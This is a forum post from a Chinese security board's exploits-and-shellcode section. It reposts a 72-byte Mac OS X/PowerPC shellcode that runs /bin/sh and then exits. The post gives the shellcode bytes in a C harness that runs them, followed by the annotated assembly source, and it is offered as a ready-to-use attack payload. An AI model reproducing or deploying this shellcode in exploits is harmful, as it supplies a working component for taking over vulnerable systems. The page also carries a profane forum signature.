os-x/ppc execve(/bin/sh), exit() 72 bytes

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9802
精华: 768
积分: 40165
阅读权限: 200
性别: 男
在线时间: 3968 小时
注册时间: 2004-7-4
最后登录: 2008-7-8

发短消息
加为好友
当前离线

楼主大中小发表于 2006-5-5 16:51 只看该作者

os-x/ppc execve(/bin/sh), exit() 72 bytes

文章作者：hophet

复制内容到剪贴板

代码:

/*

 * [MacOSX/PowerPC]

 * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL), exit()

 * 72 bytes

 * hophet [at] gmail.com

 * [url]http://www.nlabs.com.br/~hophet/[/url]

 *

 */



#include <stdio.h>

#include <string.h>



char shellcode[] = 



"\x7c\xa5\x2a\x79"

"\x40\x82\xff\xfd"

"\x7d\x68\x02\xa6"

"\x3b\xeb\x01\x71"

"\x39\x40\x01\x71"

"\x39\x1f\xfe\xce"

"\x7c\xa8\x29\xae"

"\x38\x7f\xfe\xc7"

"\x90\x61\xff\xf8"

"\x90\xa1\xff\xfc"

"\x38\x81\xff\xf8"

"\x38\x0a\xfe\xca"

"\x44\xff\xff\x02"

"\x60\x60\x60\x60"

"\x38\x0a\xfe\x90"

"\x44\xff\xff\x02"

"\x2f\x62\x69\x6e"

"\x2f\x73\x68\x54";



int main() {



  void (*p)();

  p = (void *)&shellcode;

  printf("Lenght: %d\n", strlen(shellcode));

  p();

}

/*

.globl _main

.text

_main:

      xor.   r5, r5, r5  // r5 = NULL

      bnel   _main

      mflr   r11

      addi   r31, r11, 369

      li    r10, 369

      addi   r8, r31, -306

      stbx   r5, r8, r5

      addi   r3, r31, -313

      stw    r3, -8(r1)  // [/bin/sh]

      stw    r5, -4(r1)

      subi   r4, r1, 8  // [/bin/sh]

      addi   r0, r10, -310  // r0 = 59

      .long  0x44ffff02  // sc opcode

      .long  0x60606060  // NOP

      addi   r0, r10, -368  // r0 = 1

      .long  0x44ffff02  // sc opcode

string:  .asciz  "/bin/shT"

*/

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » 毒箭羽翼[ Shellcodez Query ] » os-x/ppc execve(/bin/sh), exit() 72 bytes